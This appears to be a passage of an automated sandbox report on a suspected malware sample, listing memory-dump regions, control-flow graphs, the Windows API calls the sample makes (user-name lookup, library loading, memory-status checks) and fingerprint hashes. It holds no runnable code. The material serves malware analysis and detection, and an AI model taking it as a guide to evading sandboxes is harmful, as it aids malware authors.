                                                                                        • Opcode Fuzzy Hash: ba378307afd95c4e0f738578fd1dd580c91190f419c1cacee386b4258a0fa298
                                                                                        • Instruction Fuzzy Hash: 15116AB2901209CFDB60EFAAC54879EBBF8EB48315F648529D409B7740C7B96944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 40 12a28a8-12a28e8 call 12a26d0 call 12a2728 45 12a28ea-12a28ec 40->45 46 12a28ee 40->46 47 12a28f3-12a28fb 45->47 46->47 48 12a28fd-12a292e RtlEncodePointer 47->48 49 12a2957-12a2969 47->49 51 12a2930-12a2936 48->51 52 12a2937-12a294d 48->52 51->52 52->49
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A291D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: a04a33e1ee202585eb0cea5fba545c00fecd293041228812821ff15610f703f7
                                                                                        • Instruction ID: 0f86bcc6c7bdcc3dab813dd335080610fa4b778ad01c617bad70b479ec48eebf
                                                                                        • Opcode Fuzzy Hash: a04a33e1ee202585eb0cea5fba545c00fecd293041228812821ff15610f703f7
                                                                                        • Instruction Fuzzy Hash: C21179B1D1235ACFDB20DF99D94879EBBF8EB18354F508829D455B3600C379A544CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.390829095.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_11cd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6fd07d0c6f5fd8ebe2d9e4df3eed0ca55982bb5654130dbb7852aec31ee4ea8f
                                                                                        • Instruction ID: ce193bbb2e39e8ac042d79794531a5ed59e4608e2b3ea00dced93b8860f2c8db
                                                                                        • Opcode Fuzzy Hash: 6fd07d0c6f5fd8ebe2d9e4df3eed0ca55982bb5654130dbb7852aec31ee4ea8f
                                                                                        • Instruction Fuzzy Hash: 8C21F471504240DFDF0ADF98E9C0B66BF65FBA4728F24857DE9050A616C33AD845CBE2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.390829095.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_11cd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction ID: 00083f4117adb57e9b0fdef18bd74626966ca56c187a38ead909ce619fcb10a2
                                                                                        • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction Fuzzy Hash: 2711DF76904280CFDF16CF48D5C0B16BF72FB94324F2482ADD9054B616C33AD456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage: 7.5%
                                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                                        Signature Coverage: 12%
                                                                                        Total number of Nodes: 25
                                                                                        Total number of Limit Nodes: 3
                                                                                        execution_graph 36227 58af4e8 36228 58af4ee 36227->36228 36229 58af59a 36228->36229 36232 58afaa8 36228->36232 36235 58afab0 PeekMessageW 36228->36235 36233 58afab0 PeekMessageW 36232->36233 36234 58afb27 36233->36234 36234->36228 36236 58afb27 36235->36236 36236->36228 36215 2c45ad0 36216 2c45aee 36215->36216 36219 2c44954 36216->36219 36218 2c45b25 36222 2c475f0 LoadLibraryA 36219->36222 36221 2c476e9 36222->36221 36223 2c4f6d0 36224 2c4f731 GetUserNameW 36223->36224 36226 2c4f81d 36224->36226 36207 69fedd8 36208 69fedf2 36207->36208 36209 69ff074 36208->36209 36210 69fd060 GlobalMemoryStatusEx 36208->36210 36210->36208 36211 69fcdd8 36213 69fcded 36211->36213 36212 69fd034 36213->36212 36214 69fd060 GlobalMemoryStatusEx 36213->36214 36214->36213

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 63 2c4f6d0-2c4f72f 64 2c4f731-2c4f75c 63->64 65 2c4f79a-2c4f79e 63->65 74 2c4f78c 64->74 75 2c4f75e-2c4f760 64->75 66 2c4f7a0-2c4f7c3 65->66 67 2c4f7c9-2c4f7d4 65->67 66->67 68 2c4f7d6-2c4f7de 67->68 69 2c4f7e0-2c4f81b GetUserNameW 67->69 68->69 72 2c4f824-2c4f83a 69->72 73 2c4f81d-2c4f823 69->73 79 2c4f850-2c4f877 72->79 80 2c4f83c-2c4f848 72->80 73->72 78 2c4f791-2c4f794 74->78 76 2c4f782-2c4f78a 75->76 77 2c4f762-2c4f76c 75->77 76->78 83 2c4f770-2c4f77e 77->83 84 2c4f76e 77->84 78->65 86 2c4f887 79->86 87 2c4f879-2c4f87d 79->87 80->79 83->83 88 2c4f780 83->88 84->83 91 2c4f888 86->91 87->86 90 2c4f87f 87->90 88->76 90->86 91->91
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C4F80B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: c37fe52098926284c40f2ac021e1fced38724783f30f454ea551e5e2bdcac663
                                                                                        • Instruction ID: 16d45a9f2b16ee33c8b5fee5c4ba9762550f07d16f5779427f483bf337989dbe
                                                                                        • Opcode Fuzzy Hash: c37fe52098926284c40f2ac021e1fced38724783f30f454ea551e5e2bdcac663
                                                                                        • Instruction Fuzzy Hash: CA5104B4D002188FDB18CFA9C888B9EBBB1BF48314F15812ED815AB751DB78A844CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1445 69fb828-69fb841 1446 69fb843-69fb846 1445->1446 1447 69fb848 1446->1447 1448 69fb856-69fb859 1446->1448 1451 69fb84e-69fb851 1447->1451 1449 69fb85f-69fb862 1448->1449 1450 69fbac6-69fbacf 1448->1450 1453 69fb864-69fb86d 1449->1453 1454 69fb87f-69fb882 1449->1454 1452 69fbad5-69fbadf 1450->1452 1450->1453 1451->1448 1455 69fb873-69fb87a 1453->1455 1456 69fbae0-69fbb11 1453->1456 1457 69fb8a5-69fb8a8 1454->1457 1458 69fb884-69fb8a0 1454->1458 1455->1454 1466 69fbb13-69fbb16 1456->1466 1459 69fb8aa-69fb8af 1457->1459 1460 69fb8b2-69fb8b4 1457->1460 1458->1457 1459->1460 1461 69fb8bb-69fb8be 1460->1461 1462 69fb8b6 1460->1462 1461->1446 1465 69fb8c0-69fb973 1461->1465 1462->1461 1593 69fb979-69fb984 1465->1593 1594 69fba84-69fbaa8 1465->1594 1467 69fbb39-69fbb3c 1466->1467 1468 69fbb18-69fbb34 1466->1468 1471 69fbb3e-69fbb41 1467->1471 1472 69fbbb3-69fbbbc 1467->1472 1468->1467 1476 69fbb43-69fbb4d 1471->1476 1477 69fbb52-69fbb55 1471->1477 1473 69fbced-69fbcf6 1472->1473 1474 69fbbc2 1472->1474 1481 69fbd3a-69fbd6e 1473->1481 1482 69fbcf8-69fbcff 1473->1482 1480 69fbbc7-69fbbca 1474->1480 1476->1477 1478 69fbb5f-69fbb62 1477->1478 1479 69fbb57-69fbb5a 1477->1479 1484 69fbb6a-69fbb6d 1478->1484 1485 69fbb64-69fbb65 1478->1485 1479->1478 1486 69fbbcc-69fbbce 1480->1486 1487 69fbbd1-69fbbd4 1480->1487 1506 69fbd70-69fbd73 1481->1506 1488 69fbd04-69fbd07 1482->1488 1491 69fbb6f-69fbba0 1484->1491 1492 69fbba5-69fbba8 1484->1492 1485->1484 1486->1487 1493 69fbbef-69fbbf2 1487->1493 1494 69fbbd6-69fbbe4 1487->1494 1495 69fbd09-69fbd0f 1488->1495 1496 69fbd16-69fbd18 1488->1496 1491->1492 1492->1495 1499 69fbbae-69fbbb1 1492->1499 1502 69fbbff-69fbc02 1493->1502 1503 69fbbf4-69fbbfa 1493->1503 1494->1485 1519 69fbbea 1494->1519 1500 69fbcd7-69fbcdd 1495->1500 1501 69fbd11 1495->1501 1504 69fbd1f-69fbd22 1496->1504 1505 69fbd1a 1496->1505 1499->1472 1499->1480 
1500->1481 1507 69fbcdf-69fbce3 1500->1507 1501->1496 1511 69fbc1b-69fbc1e 1502->1511 1512 69fbc04-69fbc16 1502->1512 1503->1502 1504->1466 1513 69fbd28-69fbd39 1504->1513 1505->1504 1514 69fbd75-69fbd7f 1506->1514 1515 69fbd80-69fbd83 1506->1515 1518 69fbce8-69fbceb 1507->1518 1516 69fbc2b-69fbc2e 1511->1516 1517 69fbc20-69fbc26 1511->1517 1512->1511 1520 69fbdab-69fbdae 1515->1520 1521 69fbd85 1515->1521 1522 69fbc69-69fbc6c 1516->1522 1523 69fbc30-69fbc64 1516->1523 1517->1516 1518->1473 1518->1488 1519->1493 1524 69fbdc5-69fbdc8 1520->1524 1525 69fbdb0-69fbdbe 1520->1525 1530 69fbd8f-69fbda6 1521->1530 1533 69fbc6e-69fbc73 1522->1533 1534 69fbc76-69fbc79 1522->1534 1523->1522 1531 69fbdeb-69fbded 1524->1531 1532 69fbdca-69fbde6 1524->1532 1544 69fbdfd-69fbe2a 1525->1544 1547 69fbdc0 1525->1547 1530->1520 1537 69fbdef 1531->1537 1538 69fbdf4-69fbdf7 1531->1538 1532->1531 1533->1534 1535 69fbc7b-69fbc9b 1534->1535 1536 69fbca0-69fbca3 1534->1536 1535->1536 1545 69fbca5-69fbcc7 1536->1545 1546 69fbcd2-69fbcd5 1536->1546 1537->1538 1538->1506 1538->1544 1570 69fbfb7-69fbfbc 1544->1570 1571 69fbe30-69fbe52 1544->1571 1545->1479 1568 69fbccd 1545->1568 1546->1500 1546->1518 1547->1524 1568->1546 1577 69fbfc1-69fbfcb 1570->1577 1576 69fbe58-69fbe61 1571->1576 1571->1577 1576->1570 1579 69fbe67-69fbe6f 1576->1579 1580 69fbe75-69fbe8e 1579->1580 1581 69fbfa3-69fbfaf 1579->1581 1588 69fbf99-69fbf9e 1580->1588 1589 69fbe94-69fbec0 1580->1589 1581->1576 1582 69fbfb5 1581->1582 1582->1577 1588->1581 1589->1588 1606 69fbec6-69fbeee 1589->1606 1599 69fb99c-69fba7e 1593->1599 1600 69fb986-69fb98c 1593->1600 1602 69fbaaa 1594->1602 1603 69fbab2 1594->1603 1599->1593 1599->1594 1604 69fb98e 1600->1604 1605 69fb990-69fb992 1600->1605 1602->1603 1608 69fbab3 1603->1608 1604->1599 1605->1599 1606->1588 1612 69fbef4-69fbf0e 1606->1612 1608->1608 1612->1588 1616 69fbf14-69fbf30 1612->1616 1616->1588 1622 69fbf32-69fbf51 1616->1622 1622->1588 1627 69fbf53-69fbf97 1622->1627 1627->1581
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4e21e5f46636e03873b697bf789ac61f1a43d925184df2e015acf2f7166b41b6
                                                                                        • Instruction ID: 9602778d31a9a38c70daacd54a34e0d295a7efd1a4903d746b7e6b2d34af535a
                                                                                        • Opcode Fuzzy Hash: 4e21e5f46636e03873b697bf789ac61f1a43d925184df2e015acf2f7166b41b6
                                                                                        • Instruction Fuzzy Hash: 6922D170B201058FDB94EF68C494A6EB7E6EF88314F228869E60ADB755DF35DC41CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1647 58af4e8-58af54b 1649 58af57a-58af598 1647->1649 1650 58af54d-58af577 1647->1650 1655 58af59a-58af59c 1649->1655 1656 58af5a1-58af5d8 1649->1656 1650->1649 1657 58afa5a-58afa6f 1655->1657 1660 58afa09 1656->1660 1661 58af5de-58af5f2 1656->1661 1664 58afa0e-58afa24 1660->1664 1662 58af621-58af640 1661->1662 1663 58af5f4-58af61e 1661->1663 1670 58af658-58af65a 1662->1670 1671 58af642-58af648 1662->1671 1663->1662 1664->1657 1675 58af679-58af682 1670->1675 1676 58af65c-58af674 1670->1676 1673 58af64a 1671->1673 1674 58af64c-58af64e 1671->1674 1673->1670 1674->1670 1677 58af68a-58af691 1675->1677 1676->1664 1678 58af69b-58af6a2 1677->1678 1679 58af693-58af699 1677->1679 1681 58af6ac 1678->1681 1682 58af6a4-58af6aa 1678->1682 1680 58af6af-58af6c3 1679->1680 1753 58af6c5 call 58afaa8 1680->1753 1754 58af6c5 call 58afab0 1680->1754 1681->1680 1682->1680 1683 58af6ca-58af6cc 1684 58af6d2-58af6d9 1683->1684 1685 58af821-58af825 1683->1685 1684->1660 1686 58af6df-58af71c 1684->1686 1687 58af82b-58af82f 1685->1687 1688 58af9f4-58afa07 1685->1688 1696 58af9ea-58af9ee 1686->1696 1697 58af722-58af727 1686->1697 1689 58af849-58af852 1687->1689 1690 58af831-58af844 1687->1690 1688->1664 1691 58af881-58af888 1689->1691 1692 58af854-58af87e 1689->1692 1690->1664 1694 58af88e-58af895 1691->1694 1695 58af927-58af93c 1691->1695 1692->1691 1699 58af897-58af8c1 1694->1699 1700 58af8c4-58af8e6 1694->1700 1695->1696 1707 58af942-58af944 1695->1707 1696->1677 1696->1688 1701 58af759-58af76c 1697->1701 1702 58af729-58af737 1697->1702 1699->1700 1700->1695 1730 58af8e8-58af8f2 1700->1730 1705 58af773-58af777 1701->1705 1702->1701 1710 58af739-58af757 1702->1710 1711 58af7e8-58af7f5 1705->1711 1712 58af779-58af78b call 58a4288 1705->1712 1713 58af991-58af9ae 1707->1713 1714 58af946-58af97f 1707->1714 1710->1705 1711->1696 1726 58af7fb-58af805 1711->1726 1734 58af7cb-58af7e3 1712->1734 
1735 58af78d-58af7bd 1712->1735 1713->1696 1725 58af9b0-58af9dc 1713->1725 1728 58af988-58af98f 1714->1728 1729 58af981-58af987 1714->1729 1737 58af9de 1725->1737 1738 58af9e3 1725->1738 1739 58af807-58af80f 1726->1739 1740 58af814-58af81c 1726->1740 1728->1696 1729->1728 1742 58af90a-58af925 1730->1742 1743 58af8f4-58af8fa 1730->1743 1734->1664 1749 58af7bf 1735->1749 1750 58af7c4 1735->1750 1737->1738 1738->1696 1739->1696 1740->1696 1742->1695 1742->1730 1747 58af8fe-58af900 1743->1747 1748 58af8fc 1743->1748 1747->1742 1748->1742 1749->1750 1750->1734 1753->1683 1754->1683
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc616a0898ff82da8e349e283dc909fa8d829943f6dd75a7c609d91c27ccbe0a
                                                                                        • Instruction ID: ba475f2e4a9db82434565311b3fc1262c53f04cd487ae1791287afe9be119427
                                                                                        • Opcode Fuzzy Hash: cc616a0898ff82da8e349e283dc909fa8d829943f6dd75a7c609d91c27ccbe0a
                                                                                        • Instruction Fuzzy Hash: A5F14D35A00209DFEB14DFA9C944BADBBF2BF88304F158169E905EB265DB74ED45CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41176b2e18bc28318c2339d13f2a4816ca6ca79cd8e80d33606023fc50b876f0
                                                                                        • Instruction ID: f434af33f717067d857a935681ee44a8fd06f1463b7dfd36fcf0156e8d385a49
                                                                                        • Opcode Fuzzy Hash: 41176b2e18bc28318c2339d13f2a4816ca6ca79cd8e80d33606023fc50b876f0
                                                                                        • Instruction Fuzzy Hash: A1D12E75E002099FCB14DFA8D484AAEFBF1FF88314F14856AD515AB361DB34EA46CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 17bde18fe52ba48a89f325c232d956eedf4aa2e59a637433c0782240503afc49
                                                                                        • Instruction ID: 7c5483f90bb79e9e585c9e83f4ee616922a3b2d05350e875266eaf8201cfd42c
                                                                                        • Opcode Fuzzy Hash: 17bde18fe52ba48a89f325c232d956eedf4aa2e59a637433c0782240503afc49
                                                                                        • Instruction Fuzzy Hash: 88B17C70E40609CFDF14CFA9C9957AEBBF2AF88714F148129E815E7294EB749981CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 107f03fa2875cd0fb0e39985dd8e6be10f00d8caa87ae174e5c933f4bc66620a
                                                                                        • Instruction ID: 8c7d95e5b5d9a46f1a2200318ab9ba30eb272854301071056713ede33167c020
                                                                                        • Opcode Fuzzy Hash: 107f03fa2875cd0fb0e39985dd8e6be10f00d8caa87ae174e5c933f4bc66620a
                                                                                        • Instruction Fuzzy Hash: 5D918CB0E00219DFDF14CFA9C9947EFBBF2AF88714F148129E419A7294EB349941CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6f16733d1da02d17bc82ac29f83d6b0dc8904ce02044919284dc929c27a1fff
                                                                                        • Instruction ID: 137bf76e7f913db0741e21bf5ed4dd7ff2476c9f1481e8a65921d77a039c47a9
                                                                                        • Opcode Fuzzy Hash: f6f16733d1da02d17bc82ac29f83d6b0dc8904ce02044919284dc929c27a1fff
                                                                                        • Instruction Fuzzy Hash: CF415771D143559FCB10CF69C8102EEBFB5AF89310F25826BE605E7A50DB349844CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 2c4f6c4-2c4f888; GetUserNameW is called from block 2c4f7e0-2c4f81b.]
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C4F80B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 2aaaa8b23ae36bba09ef7360869e02c2260515fc47cba9fc8c1ea034ebadddd7
                                                                                        • Instruction ID: b3ff31ea56edca78670a944f1717d7cada3d03a45ba335f0b9addbd5682c89ee
                                                                                        • Opcode Fuzzy Hash: 2aaaa8b23ae36bba09ef7360869e02c2260515fc47cba9fc8c1ea034ebadddd7
                                                                                        • Instruction Fuzzy Hash: 055114B4D002188FDB18CFA9D888B9EBBB1BF48314F15812ED815BB751DB78A844CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 2c475e5-2c47732; LoadLibraryA is called from block 2c4769b-2c476e7.]
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02C476D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d5214651e806d6eb76e84a72ef35a3243ac620b171dfeb3c3d5f10b03e79cd97
                                                                                        • Instruction ID: 6dd56c9e3ec928ba0bf933de087930b705800f182b310fb7bd27c94756c974fc
                                                                                        • Opcode Fuzzy Hash: d5214651e806d6eb76e84a72ef35a3243ac620b171dfeb3c3d5f10b03e79cd97
                                                                                        • Instruction Fuzzy Hash: A64136B1D106198FDB10CFA9C9847DEFBF6EB48314F10852AE815AB344DB749849CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 2c44954-2c47732; LoadLibraryA is called from block 2c4769b-2c476e7.]
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02C476D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 0a26b97cd2d7be6ae022ef6fa0d725cd1387d8f2f54639bfa1320cbfa9414ba9
                                                                                        • Instruction ID: ae077d5eca0f8cccf17f3072dd7c9ed5d94b86131ceb0e4a45863d1360fa4d86
                                                                                        • Opcode Fuzzy Hash: 0a26b97cd2d7be6ae022ef6fa0d725cd1387d8f2f54639bfa1320cbfa9414ba9
                                                                                        • Instruction Fuzzy Hash: 3D4127B1D006198FDB10CFA9C9847DEFBF6EB48314F148529E815AB384DB749849CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 58afaa8-58afb4f; PeekMessageW is called from block 58afaa8-58afb25.]
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 058AFB18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: d921913f6cf716beb471ba625b040d077f91b512c00e0794201bcf2113c70f95
                                                                                        • Instruction ID: 57e84912e7972d3c22c227bcb806cebe4b0eccc946efa64cb8b4c7af5d18a256
                                                                                        • Opcode Fuzzy Hash: d921913f6cf716beb471ba625b040d077f91b512c00e0794201bcf2113c70f95
                                                                                        • Instruction Fuzzy Hash: DF212CB68002099FDB10DF9AD944BDEFBF8FF48320F10841AE955A3210C378A545DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 58afab0-58afb4f; PeekMessageW is called from block 58afab0-58afb25.]
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 058AFB18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: 51ed88818aa160e19e855de6f7ae8ee7b150c3264969ffa53a6a3a11870b5911
                                                                                        • Instruction ID: baac85138ca2cdc3d00315880ccaba4c7c2a0ace9b52a87bd97d171dd79cf2ac
                                                                                        • Opcode Fuzzy Hash: 51ed88818aa160e19e855de6f7ae8ee7b150c3264969ffa53a6a3a11870b5911
                                                                                        • Instruction Fuzzy Hash: 7E1107B6C002099FDB10CF9AD584BDEFBF8FB48324F10842AE955A3650C378A945DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        [graph image not reproduced; legend: Executed / Not Executed. Basic blocks 69fed20-69fedc5; GlobalMemoryStatusEx is called from block 69fed66-69fed94.]
                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 069FED87
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 930da75697ab8632a403357bcdd5e92a51f3a67bf09b0ccf227f679e28e7c958
                                                                                        • Instruction ID: 14ba21e89af58bf7fc9f66cd2179cdb98e3430ec8b479040a948ae4e8585c7a4
                                                                                        • Opcode Fuzzy Hash: 930da75697ab8632a403357bcdd5e92a51f3a67bf09b0ccf227f679e28e7c958
                                                                                        • Instruction Fuzzy Hash: 021112B1C006199BCB10DF9AC444BDEFBF8AF48324F15816AD918B7640D378A944CFE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a4598b411b545373d393e085454bcded84a3e5665041c8073bda6444035c116
                                                                                        • Instruction ID: f4edcdd610e5352574ad631f489547af03945d90f6b13805c2422b5f281ec0f2
                                                                                        • Opcode Fuzzy Hash: 9a4598b411b545373d393e085454bcded84a3e5665041c8073bda6444035c116
                                                                                        • Instruction Fuzzy Hash: F3210671510248DFDB01DF98D9C0B66FF65FB84324F24C67DEA090B206C33AE446C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4464df1ff38c719dbefb3dd528741fb9eda8353db4756a8deda258d47de45e3e
                                                                                        • Instruction ID: bfd10e4cfd1683bca948d80cb33c084c3dd293f7ddc1e6da7cebae5213b82465
